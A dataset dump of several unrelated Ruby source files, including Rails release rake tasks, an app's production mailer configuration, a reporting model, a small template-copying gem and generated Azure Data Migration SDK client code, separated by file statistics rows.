header = "## Rails #{version} (#{Date.today.strftime('%B %d, %Y')}) ##\n\n* No changes.\n\n\n"
contents = header + File.read(fname)
File.open(fname, 'wb') { |f| f.write contents }
end
end
task :release_date do
(FRAMEWORKS + ['guides']).each do |fw|
require 'date'
replace = "## Rails #{version} (#{Date.today.strftime('%B %d, %Y')}) ##\n"
fname = File.join fw, 'CHANGELOG.md'
contents = File.read(fname).sub(/^(## Rails .*)\n/, replace)
File.open(fname, 'wb') { |f| f.write contents }
end
end
task :release_summary do
(FRAMEWORKS + ['guides']).each do |fw|
puts "## #{fw}"
fname = File.join fw, 'CHANGELOG.md'
contents = File.readlines fname
contents.shift
changes = []
changes << contents.shift until contents.first =~ /^\*Rails \d+\.\d+\.\d+/
puts changes.reject { |change| change.strip.empty? }.join
puts
end
end
end
namespace :all do
task :build => FRAMEWORKS.map { |f| "#{f}:build" } + ['rails:build']
task :update_versions => FRAMEWORKS.map { |f| "#{f}:update_versions" } + ['rails:update_versions']
task :install => FRAMEWORKS.map { |f| "#{f}:install" } + ['rails:install']
task :push => FRAMEWORKS.map { |f| "#{f}:push" } + ['rails:push']
task :ensure_clean_state do
unless `git status -s | grep -v 'RAILS_VERSION\\|CHANGELOG\\|Gemfile.lock'`.strip.empty?
abort "[ABORTING] `git status` reports a dirty tree. Make sure all changes are committed"
end
unless ENV['SKIP_TAG'] || `git tag | grep '^#{tag}$'`.strip.empty?
abort "[ABORTING] `git tag` shows that #{tag} already exists. Has this version already\n"\
" been released? Git tagging can be skipped by setting SKIP_TAG=1"
end
end
task :bundle do
sh 'bundle check'
end
task :commit do
File.open('pkg/commit_message.txt', 'w') do |f|
f.puts "# Preparing for #{version} release\n"
f.puts
f.puts "# UNCOMMENT THE LINE ABOVE TO APPROVE THIS COMMIT"
end
sh "git add . && git commit --verbose --template=pkg/commit_message.txt"
rm_f "pkg/commit_message.txt"
end
task :tag do
sh "git tag -s -m '#{tag} release' #{tag}"
sh "git push --tags"
end
task :prep_release => %w(ensure_clean_state build)
task :release => %w(ensure_clean_state build bundle commit tag push)
end
| 33.363636 | 123 | 0.561308 |
4a8b4a20d4597880a51ec7d1a9a855d74f131b3d | 4,128 | EMAIL_ADDR = '[email protected]'
DEV_EMAIL = '[email protected]'
EMAIL_PWD = ENV['EMAIL_KEY']
SEND_EMAILS = true
VIDEOS_ONLINE = true
FILTERING = true
ALLOW_SEARCH = true
SHOW_MENU = true
SHOW_DEBUG = false
CHECK_YOUTUBE = false
SHOW_ADMIN_FIELDS = true
Aiki::Application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both thread web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Enable Rack::Cache to put a simple HTTP cache in front of your application
# Add `rack-cache` to your Gemfile before enabling this.
# For large-scale production use, consider using a caching reverse proxy like nginx, varnish or squid.
# config.action_dispatch.rack_cache = true
# Disable Rails's static asset server (Apache or nginx will already do this).
config.serve_static_assets = false
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# Generate digests for assets URLs.
config.assets.digest = true
# Version of your assets, change this if you want to expire all your assets.
config.assets.version = '1.0'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = "X-Sendfile" # for apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for nginx
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Set to :debug to see everything in the log.
config.log_level = :info
# Prepend all log lines with the following tags.
# config.log_tags = [ :subdomain, :uuid ]
# Use a different logger for distributed setups.
# config.logger = ActiveSupport::TaggedLogging.new(SyslogLogger.new)
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = "http://assets.example.com"
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
# config.assets.precompile += %w( search.js )
# Mailer settings (See: http://guides.rubyonrails.org/action_mailer_basics.html)
config.action_mailer.default_url_options = { host: 'yurusu-video.herokuapp.com' }
config.action_mailer.raise_delivery_errors = true
config.action_mailer.perform_deliveries = SEND_EMAILS # Whether or not to actually send emails when calling #deliver on an ActionMailer action. Set to `false` to aid in functional testing.
# config.action_mailer.logger = nil
config.action_mailer.delivery_method = :smtp
config.action_mailer.smtp_settings = {
:address => 'smtp.gmail.com',
:port => 587,
:domain => EMAIL_ADDR.split('@').last,
:user_name => EMAIL_ADDR,
:password => EMAIL_PWD,
:authentication => 'plain',
:enable_starttls_auto => true
}
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation can not be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Disable automatic flushing of the log to improve performance.
# config.autoflush_log = false
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
end
| 38.579439 | 190 | 0.738372 |
e2e811db1bc4d9b53f7a75dafaaa1e462adaff90 | 4,137 | # frozen_string_literal: true
class AutomatedReport < ApplicationRecord
has_many :automated_report_instances, dependent: :destroy
has_many :automated_report_subscriptions, dependent: :destroy
valhammer
validates :interval, inclusion: { in: %w[monthly quarterly yearly] }
validate :target_must_be_valid_for_report_type,
:report_class_must_be_known,
:source_must_be_valid_for_report_type
def interval
value = super
value && ActiveSupport::StringInquirer.new(value)
end
def target_name
type = report_class
return 'Identity Providers' if type == 'IdentityProviderUtilizationReport'
return 'Service Providers' if type == 'ServiceProviderUtilizationReport'
return 'Federation' if klass.nil?
return target.titleize if klass.eql? :object_type
target_object.name
end
def target_object
klass.find_by_identifying_attribute(target)
end
def self.report_class_needs_source?(report_class)
REPORTS_THAT_NEED_SOURCE.include?(report_class)
end
def self.report_class_needs_target?(report_class)
!TARGET_CLASSES[report_class].nil?
end
def needs_source?
AutomatedReport.report_class_needs_source?(report_class)
end
def source_if_needed
return nil unless needs_source?
return source if source.present?
return Rails.application.config.reporting_service.default_session_source if
Rails.application.config.reporting_service.default_session_source.present?
# Complete fall back: default to DS if source is not set in params
# and not in app_config.
'DS'
end
private
TARGET_CLASSES = {
'DailyDemandReport' => nil,
'FederatedSessionsReport' => nil,
'FederationGrowthReport' => nil,
'IdentityProviderAttributesReport' => nil,
'IdentityProviderUtilizationReport' => nil,
'ServiceProviderUtilizationReport' => nil,
'SubscriberRegistrationsReport' => :object_type,
'IdentityProviderDailyDemandReport' => IdentityProvider,
'IdentityProviderDestinationServicesReport' => IdentityProvider,
'IdentityProviderSessionsReport' => IdentityProvider,
'ProvidedAttributeReport' => SAMLAttribute,
'RequestedAttributeReport' => SAMLAttribute,
'ServiceCompatibilityReport' => ServiceProvider,
'ServiceProviderDailyDemandReport' => ServiceProvider,
'ServiceProviderSessionsReport' => ServiceProvider,
'ServiceProviderSourceIdentityProvidersReport' => ServiceProvider
}.freeze
SOURCE_VALUES = %w[DS IdP].freeze
private_constant :TARGET_CLASSES, :SOURCE_VALUES
def klass
TARGET_CLASSES[report_class]
end
def report_class_must_be_known
return if TARGET_CLASSES.key?(report_class)
errors.add(:report_class, 'must be of known type')
end
def target_must_be_valid_for_report_type
return if report_class.nil?
return target_must_be_nil if klass.nil?
return target_must_be_object_type_identifier if klass == :object_type
return if klass.find_by_identifying_attribute(target)
errors.add(:target, 'must be appropriate for the report type')
end
REPORTS_THAT_NEED_SOURCE = %w[
DailyDemandReport FederatedSessionsReport IdentityProviderDailyDemandReport
IdentityProviderDestinationServicesReport IdentityProviderSessionsReport
ServiceProviderDailyDemandReport ServiceProviderSessionsReport
ServiceProviderSourceIdentityProvidersReport
IdentityProviderUtilizationReport ServiceProviderUtilizationReport
].freeze
def source_must_be_valid_for_report_type
return if report_class.nil?
return if needs_source? && SOURCE_VALUES.include?(source)
return if !needs_source? && source.nil?
errors.add(:source, "is not valid for report #{report_class}")
end
def target_must_be_nil
return if target.nil?
errors.add(:target, 'must be omitted for the report type')
end
OBJECT_TYPE_IDENTIFIERS =
%w[identity_providers service_providers organizations
rapid_connect_services services].freeze
def target_must_be_object_type_identifier
return if OBJECT_TYPE_IDENTIFIERS.include?(target)
errors.add(:target, 'must be an object type identifier')
end
end
| 30.873134 | 80 | 0.773266 |
91dc1fd1d36bfd0424071d16cfb7b36f6548a288 | 296 | # set locale to en_US.UTF-8 (which matches the live server) everywhere ubuntu
# packages might look for it, invcluding the current process
ENV['LANG'] = "en_US.UTF-8"
ENV['LC_ALL'] = "en_US.UTF-8"
template "/etc/default/locale" do
source "locale"
owner "root"
group "root"
mode 0644
end | 24.666667 | 77 | 0.712838 |
bb351e6755870a2693621034065bcfa3fc59a91c | 939 | ENV["RAILS_ENV"] = "test"
require File.expand_path(File.dirname(__FILE__) + "/../config/environment")
require 'test_help'
require "authlogic/test_case"
require "webrat"
Webrat.configure do |config|
config.mode = :rails
config.open_error_files = false
end
class ActionController::TestCase
include Webrat::Matchers
def response_body
@response.body
end
end
class ActiveSupport::TestCase
include RR::Adapters::TestUnit unless include?(RR::Adapters::TestUnit)
self.use_transactional_fixtures = true
self.use_instantiated_fixtures = false
# Login helper for integration tests.
# if your test does not define a @user this will do that for you
def login
@user = Factory(:user) unless defined?(@user)
visit login_path
fill_in 'Email', :with => @user.email
fill_in 'Password', :with => 'secret'
click_button 'LOGIN'
end
def featured
Factory(:user)
Factory(:active_project)
end
end
| 22.902439 | 75 | 0.726305 |
03e25019883a0ec6a3e1b2009c965a20f4ddc84a | 3,142 | require 'fileutils'
require "yaarg/version"
module Yaarg
# Main class
# class Yaarg
# Return help instructions.
def self.help
# TODO implement usage instruction for all modules
"============================================================================================================" +
"============================================================================================================" +
"|| Copyright (C) 2016 - 2017 - GPLv3 - Jefferson Campos - foguinho [dot] peruca [at] gmail [dot] com ||" +
"|| Yet Another AdminLTE Ruby Gem! ||" +
"|| The gem has many modules: ||" +
"|| * tpl: help to manage templates to rails app. ||" +
"|| * adminlte: manage adminlte. ||" +
"============================================================================================================" +
"============================================================================================================" +
"" +
"tpl" +
"===" +
"" +
"USAGE: printer_outsourcing [verifySONumber|parsePhysicalSite|parseDepartment|parsePrinterType|generateSeedSO]" +
"* verifySONumber : Report if a SO number is in so_audit.csv" +
"* parsePhysicalSite : Merge data from physicalSite.csv with so_audit.csv" +
"* parseDepartment : Merge data from so_with_physicalSite_parsed.csv with department.csv" +
"* parsePrinterType : Merge data from so_with_physicalSite-department_parsed.csv with printerType.csv" +
"* generateSeedSO : Generate seed data to ../data/redmine_issues.csv" +
"" +
"WORKFLOW:" +
"# Generate missing SO numbers:" +
"../data/parse_so/audited_so.csv --> ../data/parse_soso_missing.csv" +
"Unified Printer Registration module" +
"==================================="
end
def self.ver
VERSION
end
def self.tpl(project_path)
tpl_model(project_path)
tpl_view(project_path)
tpl_controller(project_path)
end
def self.tpl_model(project_path)
path = project_path + "lib/templates/active_record/model/"
FileUtils.mkdir_p(path) unless Dir.exist? path
FileUtils.cp(File.dirname(__FILE__) + "/templates/active_record/model/model.rb", path)
end
def self.tpl_view(project_path)
path = project_path + "lib/templates/erb/scaffold"
FileUtils.mkdir_p(path) unless Dir.exist? path
FileUtils.cp(File.dirname(__FILE__) + "/templates/erb/scaffold/index.html.erb", path)
FileUtils.cp(File.dirname(__FILE__) + "/templates/erb/scaffold/_form.html.erb", path)
end
def self.tpl_controller(project_path)
path = project_path + "lib/templates/rails/scaffold_controller/"
FileUtils.mkdir_p(path) unless Dir.exist? path
FileUtils.cp(File.dirname(__FILE__) + "/templates/rails/scaffold_controller/controller.rb", path)
end
# end
end
| 45.536232 | 119 | 0.507638 |
26508203bbf3f4a55bb67032e46112c313df1982 | 214 | class AddSpreeNewslettersTable < SolidusSupport::Migration[4.2]
def change
create_table :spree_newsletters do |t|
t.string :name
t.string :email
t.timestamps null: false
end
end
end
| 19.454545 | 63 | 0.686916 |
61d31b02a2c144e07b612edd86acefb22618f76a | 85,624 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::DataMigration::Mgmt::V2018_03_15_preview
#
# Data Migration Client
#
class Services
include MsRestAzure
#
# Creates and initializes a new instance of the Services class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [DataMigrationServiceClient] reference to the DataMigrationServiceClient
attr_reader :client
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def create_or_update(parameters, group_name, service_name, custom_headers:nil)
response = create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_or_update_async(parameters, group_name, service_name, custom_headers:nil)
# Send request
promise = begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def get(group_name, service_name, custom_headers:nil)
response = get_async(group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(group_name, service_name, custom_headers:nil)
get_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Get DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The GET method retrieves information about a service
# instance.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
response = delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers).value!
nil
end
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_async(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
# Send request
promise = begin_delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Create or update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def update(parameters, group_name, service_name, custom_headers:nil)
response = update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_async(parameters, group_name, service_name, custom_headers:nil)
# Send request
promise = begin_update_async(parameters, group_name, service_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Check service health status
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action performs a health check and returns the status
# of the service and virtual machine size.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationServiceStatusResponse] operation results.
#
def check_status(group_name, service_name, custom_headers:nil)
response = check_status_async(group_name, service_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Check service health status
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action performs a health check and returns the status
# of the service and virtual machine size.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_status_with_http_info(group_name, service_name, custom_headers:nil)
check_status_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Check service health status
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action performs a health check and returns the status
# of the service and virtual machine size.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_status_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/checkStatus'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceStatusResponse.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def start(group_name, service_name, custom_headers:nil)
response = start_async(group_name, service_name, custom_headers:custom_headers).value!
nil
end
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def start_async(group_name, service_name, custom_headers:nil)
# Send request
promise = begin_start_async(group_name, service_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def stop(group_name, service_name, custom_headers:nil)
response = stop_async(group_name, service_name, custom_headers:custom_headers).value!
nil
end
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def stop_async(group_name, service_name, custom_headers:nil)
# Send request
promise = begin_stop_async(group_name, service_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<AvailableServiceSku>] operation results.
#
def list_skus(group_name, service_name, custom_headers:nil)
first_page = list_skus_as_lazy(group_name, service_name, custom_headers:custom_headers)
first_page.get_all_items
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_skus_with_http_info(group_name, service_name, custom_headers:nil)
list_skus_async(group_name, service_name, custom_headers:custom_headers).value!
end
#
# Get compatible SKUs
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The skus action returns the list of SKUs that a service
# resource can be updated to.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_skus_async(group_name, service_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/skus'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::ServiceSkuList.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Check nested resource name validity and availability
#
# This method checks whether a proposed nested resource name is valid and
# available.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [NameAvailabilityResponse] operation results.
#
def check_children_name_availability(group_name, service_name, parameters, custom_headers:nil)
response = check_children_name_availability_async(group_name, service_name, parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Check nested resource name validity and availability
#
# This method checks whether a proposed nested resource name is valid and
# available.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_children_name_availability_with_http_info(group_name, service_name, parameters, custom_headers:nil)
check_children_name_availability_async(group_name, service_name, parameters, custom_headers:custom_headers).value!
end
#
# Check nested resource name validity and availability
#
# This method checks whether a proposed nested resource name is valid and
# available.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_children_name_availability_async(group_name, service_name, parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, 'parameters is nil' if parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
